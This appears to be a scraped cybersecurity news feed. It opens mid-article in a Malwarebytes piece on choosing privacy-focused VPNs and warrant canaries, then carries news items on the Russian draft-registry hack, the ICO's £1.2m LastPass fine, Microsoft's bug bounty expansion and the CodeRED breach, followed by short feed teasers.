This setup also tends to go hand-in-hand with owning the hardware. Most public cloud environments simply don’t allow true diskless deployments with full control over the underlying machine.
Other privacy features to watch for
Even with strong infrastructure and protocols, the details still matter. A solid kill switch keeps your traffic from leaking if the connection drops. Private DNS prevents queries from being routed through third parties. Multi-hop routes make correlation attacks harder. And torrent users may want carefully implemented port forwarding that doesn’t introduce side channels.
These aren’t flashy features, but they show whether a provider has considered the full privacy landscape, not just the obvious parts.
Audits and transparency reports
A provider that truly stands behind its privacy claims will welcome outside inspection. Independent audits, published findings, and ongoing transparency reports help confirm whether logging is disabled in practice, not just in principle. Some companies also maintain warrant canaries (more on this below). None of these are perfect, but together they paint a clear picture of how seriously the VPN treats user trust.
A warrant canary in the VPN coalmine
Okay, so here’s something interesting: some companies use something called a “warrant canary” to quietly let us know if they’ve received a top-secret government request for data. Here’s the deal…it’s illegal for them to simply tell us, “Hey, the government’s snooping around.” So, instead, they publish a simple statement that says something like, “As of January 2026, we haven’t received any secret orders for your data.”
The clever part is that they update this statement on a regular basis. If it suddenly disappears or just stops getting updated, it could mean the company got hit with one of these hush-hush requests and legally can’t talk about it. It’s like the digital version of a warning signal. It is nothing flashy, but if you’re paying attention, you’ll spot when something changes.
It’s not a perfect system (and who knows what the courts will think of it in the future), but a warrant canary is one-way companies try to be on our side, finding ways to keep us in the loop even when they’re told to stay silent. So, give an extra ounce of trust to companies that publish these regularly.
Where privacy-first VPNs are heading
Expect to see continued evolution: new cryptography built for a post-quantum world, more transparency from providers, decentralized and community-run VPN options, and tighter integration with secure messaging, encrypted DNS, and whatever comes next.
It’s also worth keeping an eye on how governments respond to rising VPN use. In the UK, for example, new age-verification rules triggered a huge spike in VPN sign-ups and a public debate about whether VPN usage should be monitored more closely. There’s no proposal to restrict or ban VPNs, but the conversation is active.
If you care about your privacy online, don’t settle for slick marketing. Look for the real foundations like modern protocols, owned and well-managed infrastructure, RAM-only servers, regular audits, and a culture that treats transparency as a habit, not a stunt.
Privacy is engineered, not simply promised. With the right VPN, you stay in control of your digital life instead of hoping someone else remembers to keep your secrets safe.
We don’t just report on privacy—we offer you the option to use it.
Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.
ICO Fines LastPass £1.2m After 2022 Breach
Encouraging Industry Voices to Write for the Commentary Section
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work
New React RSC Vulnerabilities Enable DoS and Source Code Exposure
React2Shell Exploitation Escalates into Large-Scale Global Attacks, Forcing Emergency Mitigation
Russia’s Digital Military Draft System Hit by Cyberattack, Source Code Leaked
![]()
Cyberattack on Russia’s Digital Military Draft System
Micord’s website was reportedly inaccessible on Thursday, displaying a notice that it was under “technical maintenance.” Meanwhile, the investigative outlet IStories, which obtained the documents from Idite Lesom, confirmed the breach with Micord’s director, Ramil Gabdrahmanov. “Listen, it could happen to anyone. Many are being attacked right now,” Gabdrahmanov said. He declined to confirm whether Micord had worked on Russia’s unified military registration database, stating, “We work on many different projects.” Nonetheless, IStories independently verified Micord’s involvement in the digital registry. Despite the cyberattack on Russia’s digital military draft system, some users reported that the database website was still accessible, though it remained unclear whether electronic draft summonses had been disrupted. The Russian Defense Ministry dismissed the claims of a breach as “fake news,” asserting that the registry continued to operate normally. “The registry has been repeatedly subjected to hacking attacks. They have all been successfully repelled,” the ministry said, emphasizing that attempts to disrupt the system had so far “failed to achieve their objectives", reported IStories.Digital Military Draft System: Modernizing Russia’s Draft Process
The digital military draft system, part of a broader modernization of Russia’s wartime enlistment process, centralizes records of men aged 18 to 30 and allows authorities to issue summonses online, eliminating the need for in-person notifications. The system has faced multiple delays, with its initial launch scheduled for November 2024. Russia’s fall 2025 draft, which runs from October 1 to December 31, was expected to rely on this digital registry in four regions, including Moscow. Sverdlin noted that once fully operational, the online system automatically enforces restrictions on draftees who fail to report for compulsory service, including travel bans.Origins and Government Plans for the Unified Registry
The hacker group reportedly remained in Micord’s system for several months, accessing critical infrastructure, operational correspondence, and the source code, which they claimed to have destroyed. The documents were shared with journalists at IStories, who confirmed their authenticity. The Russian government first announced plans for a unified digital military registration registry in April 2023, when the State Duma passed a bill creating the system. RT Labs, a Rostelecom subsidiary, was initially named as one of the developers. In February 2024, Rostelecom was designated as the sole contractor to complete the system for the Ministry of Digital Development, Communications, and Mass Media, with a completion deadline of December 31, 2024. Though initially intended for the 2024 fall draft, the registry became fully operational only in October 2025, with several regions adopting electronic summonses and phasing out paper notifications.Password Manager LastPass Penalized £1.2m by ICO for Security Failures
![]()
Incident One: Corporate Laptop Compromised
The first incident involved a LastPass employee’s corporate laptop based in Europe. A hacker gained access to the company’s development environment and obtained encrypted company credentials. Although no personal information was taken at this stage, the credentials could have provided access to the backup database if decrypted. LastPass attempted to mitigate the hacker’s activity and believed the encryption keys remained safe, as they were stored outside the compromised environment in the vaults of four senior employees.Incident Two: Personal Device Targeted
The second incident proved more damaging. The hacker targeted one of the senior employees who had access to the decryption keys. Exploiting a known vulnerability in a third‑party streaming service, the attacker gained access to the employee’s personal device. A keylogger was installed, capturing the employee’s master password. Multi‑factor authentication was bypassed using a trusted device cookie. This allowed the hacker to access both the employee’s personal and business LastPass vaults, which were linked by a single master password. From there, the hacker obtained the Amazon Web Service (AWS) access key and decryption key stored in the business vault. Combined with information taken the previous day, this enabled the extraction of the backup database containing customer personal information.ICO’s Findings and Fine on LastPass UK
The ICO investigation concluded that LastPass failed to implement sufficiently strong technical and security measures, leaving customers exposed. Although the company’s zero knowledge encryption protected passwords, the exposure of personal data was deemed a serious failure. John Edwards, UK Information Commissioner, stated: “Password managers are a safe and effective tool for businesses and the public to manage their numerous login details, and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to reduce risks of attack. LastPass customers had a right to expect their personal information would be kept safe and secure. The company fell short of this expectation, resulting in the proportionate fine announced today.”Lessons for Businesses
The ICO has urged all UK businesses to review their systems and procedures to prevent similar risks. This case underscores the importance of restricting system access, strengthening cybersecurity measures, and ensuring that employees’ personal devices do not become weak points in corporate networks. While password managers remain a recommended tool for managing login details, the incident shows that even trusted providers can fall short if internal safeguards are not sufficiently strong. The £1.2 million fine against LastPass UK Ltd serves as a clear reminder that companies handling sensitive data must uphold the highest standards of security. Although customer passwords were protected by the company’s zero knowledge encryption system, the exposure of personal information has left millions vulnerable. The ICO’s ruling reinforces the need for constant vigilance in the face of growing cyber threats. For both businesses and individuals, the message is straightforward: adopt strong security practices, conduct regular system reviews, and implement robust employee safeguards to reduce the risk of future data breaches.AI Threat Detection: How Machines Spot What Humans Miss
Discover how AI strengthens cybersecurity by detecting anomalies, stopping zero-day and fileless attacks, and enhancing human analysts through automation.
The post AI Threat Detection: How Machines Spot What Humans Miss appeared first on Security Boulevard.
Microsoft Bug Bounty Program Gets Major Expansion With ‘In Scope By Default’
![]()
A Strategic Shift in Bug Bounty Security Incentives
Tom Gallagher, vice president of engineering at the Microsoft Security Response Center (MSRC), highlighted the significance of the change in a December 11, 2025, blog post. He described it as more than an administrative adjustment, calling it a structural realignment designed to reflect real-world risk. Gallagher explained that by defaulting all services into scope, Microsoft hopes to reduce reporting delays, minimize confusion, and allow researchers to focus on vulnerabilities with meaningful impact on customers. “If Microsoft’s online services are impacted by vulnerabilities in third-party code, including open source, we want to know,” Gallagher stated. “If no bounty award formerly exists to reward this vital work, we will offer one. This closes the gap for security research and raises the security bar for everyone who relies on this code.” The new policy also allows Microsoft to collaborate more effectively with researchers on upstream or third-party vulnerabilities. The company can now assist with developing fixes or support maintainers when issues in external codebases directly affect Microsoft services.Industry Reaction and Expected Impact
All new Microsoft online services now fall under bug bounty coverage from day one, while millions of existing endpoints no longer require manual approval to qualify. The update is designed to make it easier for security professionals to identify and report vulnerabilities across Microsoft’s expansive ecosystem. The new approach aligns with Microsoft’s broader security philosophy in an AI- and cloud-first environment, where attackers exploit any weak link, regardless of ownership. According to Gallagher, “Security vulnerabilities often emerge at the seams where components interact or where dependencies are involved. We value research that takes this broader perspective, encompassing not only Microsoft infrastructure but also third-party dependencies, including commercial software and open-source components.” Last year, Microsoft’s bug bounty program and its Zero Day Quest live-hacking event awarded over $17 million to researchers for high-impact discoveries. With the In Scope By Default initiative, the company expects to expand eligibility even further, particularly in areas involving Microsoft-owned domains, cloud services, and third-party or open-source code. Researchers participating in the program are expected to follow Microsoft’s Rules of Engagement for Responsible Security Research, ensuring customer privacy and data protection while enabling coordinated vulnerability disclosure. By widening its bug bounty scope, Microsoft aims to raise the overall security bar.How Root Cause Analysis Improves Incident Response and Reduces Downtime?
Security incidents don’t fail because of a lack of tools; they fail because of a lack of insight. In an environment where every minute of downtime equals revenue loss, customer impact, and regulatory risk, root cause analysis has become a decisive factor in how effectively organizations execute incident response and stabilize operations. The difference between […]
The post How Root Cause Analysis Improves Incident Response and Reduces Downtime? appeared first on Kratikal Blogs.
The post How Root Cause Analysis Improves Incident Response and Reduces Downtime? appeared first on Security Boulevard.
City of Cambridge Advises Password Reset After Nationwide CodeRED Data Breach
![]()
Impact of the OnSolve CodeRED Cyberattack on User Data
According to city officials, the data breach affected CodeRED databases nationwide, including Cambridge. The compromised information may include phone numbers, email addresses, and passwords of registered users. Importantly, the attack targeted the OnSolve CodeRED system itself, not the City of Cambridge or its departments. This OnSolve CodeRED cyberattack incident mirrors similar concerns raised in Monroe County, Georgia, where officials confirmed that residents’ personal information was also exposed. The Monroe County Emergency Management Agency emphasized that the breach was part of a nationwide cybersecurity incident and not a local failure.Transition to CodeRED by Crisis24
In response, OnSolve permanently decommissioned the old CodeRED platform and migrated services to a new, secure environment known as CodeRED by Crisis24. The new system has undergone comprehensive security audits, including penetration testing and system hardening, to ensure stronger protection against future threats. For Cambridge residents, previously registered contact information has been imported into the new platform. However, due to security concerns, all passwords have been removed. Users must now reset their credentials before accessing their accounts.Steps for City of Cambridge Residents and Users
To continue receiving emergency notifications, residents should:- Visit accountportal.onsolve.net/cambridgema
- Enter their username (usually an email address)
- Select “forgot password” to verify and reset credentials
- If unsure of their username, use the “forgot username” option
Broader National Context
The Monroe County cyberattack highlights the scale of the issue. Officials there reported that data such as names, addresses, phone numbers, and passwords were compromised. Residents who enrolled before March 31, 2025, had their information migrated to the new Crisis24 CodeRED platform, while those who signed up afterward must re‑enroll. OnSolve has reassured communities that the intrusion was contained within the original system and did not spread to other networks. While there is currently no evidence of identity theft, the incident underscores the growing risks of cyber intrusions nationwide.Resources for Cybersecurity Protection
Residents who believe they may have been victims of cyber‑enabled fraud are encouraged to report incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov. Additional resources are available to help protect individuals and families from fraud and cybercrime. Security experts note that the rising frequency of attacks highlights the importance of independent threat‑intelligence providers. Companies such as Cyble track vulnerabilities and cybercriminal activity across global networks, offering organizations tools to strengthen defenses and respond more quickly to incidents.Looking Ahead
The City of Cambridge has thanked residents for their patience as staff worked with OnSolve to restore emergency alert capabilities. Officials emphasized that any breach of security is a serious concern and confirmed that they will continue monitoring the new CodeRED by Crisis24 platform to ensure its standards are upheld. In addition, the City is evaluating other emergency alerting systems to determine the most effective long‑term solution for community safety.- Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know
Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know
As the clock ticks down to the full enforcement of Hong Kong’s Protection of Critical Infrastructures (Computer Systems) Ordinance on January 1, 2026, designated operators of Critical Infrastructures (CI) and Critical Computer Systems (CCS) must act decisively. This landmark law mandates robust cybersecurity measures for Critical Computer Systems (CCS) to prevent disruptions, with non-compliance risking […]
The post Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..
The post Hong Kong’s New Critical Infrastructure Ordinance will be effective by 1 January 2026 – What CIOs Need to Know appeared first on Security Boulevard.
Learn about changes to your online account management
Discover the latest changes in online account management, focusing on Enterprise SSO, CIAM, and enhanced security. Learn how these updates streamline login processes and improve user experience.
The post Learn about changes to your online account management appeared first on Security Boulevard.